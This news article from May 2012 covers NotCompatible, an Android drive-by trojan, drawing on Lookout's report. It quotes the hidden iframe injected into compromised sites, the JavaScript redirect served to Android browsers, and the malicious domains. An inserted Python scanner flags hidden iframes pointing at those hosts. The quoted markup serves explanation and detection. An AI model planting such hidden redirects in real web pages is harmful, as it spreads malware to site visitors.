UPDATED 11:00 EST / MAY 03 2012

Malware Hits the Mobile Web, Targets Android Handsets

Fandroids are plagued with malware left and right. Their devices can get infected by downloading apps from Google Play, but especially from unofficial third-party app stores. Worse, drive-by download malware is now attacking Android devices.

NotCompatible

Lookout Mobile Security recently identified drive-by download malware dubbed NotCompatible. Drive-by downloads are common on PCs: when a user visits an infected site, the malware secretly infects the computer if it doesn’t have updated security measures.

NotCompatible works in a similar manner: if someone uses an Android device to visit an infected site, the web browser automatically downloads an application, and when the download finishes, the device displays a notification prompting the user to click it to install the downloaded app. The installation only proceeds if the “Unknown sources” setting is enabled (this feature is commonly referred to as “sideloading”); otherwise it is blocked.

Lookout’s report stated that infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC web browser is used to access the infected site, a “not found” error appears, but if a web browser containing the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

Lookout identified the following sites serving malicious Android apps:

  • gaoanalitics.info
  • androidonlinefix.info

Command and Control (C&C) domains include:

  • notcompatibleapp.eu
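
For site owners who want to check their own pages for the injected markup described above, here is an added example (not from Lookout or the original article) that uses Python's standard library to flag style-hidden iframes and mark those pointing at the distribution domains listed above. It inspects page source rather than fetching the iframe target, since the target answers "not found" to non-Android browsers. The function names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Distribution domains named in the article (from Lookout's report).
KNOWN_BAD_HOSTS = {"gaoanalitics.info", "androidonlinefix.info"}
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

# Constructed sample page: one legitimate visible iframe, one injected hidden one.
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<iframe src="https://maps.example.com/embed" width="400" height="300"></iframe>
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
</body></html>"""


def refang(url):
    """Turn a defanged 'hxxp' scheme back into 'http' so the URL can be parsed."""
    return re.sub(r"^hxxp", "http", url.strip(), flags=re.I)


class HiddenIframeFinder(HTMLParser):
    """Records every iframe whose inline style makes it invisible."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        if not HIDDEN_STYLE.search(a.get("style", "")):
            return
        # The URL is only parsed for its hostname, never requested.
        host = (urlparse(refang(a.get("src", ""))).hostname or "").lower()
        self.findings.append({"line": self.getpos()[0], "host": host, "known_bad": host in KNOWN_BAD_HOSTS})


def scan_html(html):
    """Return one finding per hidden iframe in the given page source."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```

A hidden iframe whose host is not on the list is still reported with known_bad set to False, so it can be reviewed by hand.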

Lookout assured their subscribers that they are protected from NotCompatible, and reiterated that unless the app is actually installed, the device won’t become infected.

“Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update,” Lookout wrote in their updated report.

“This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.”

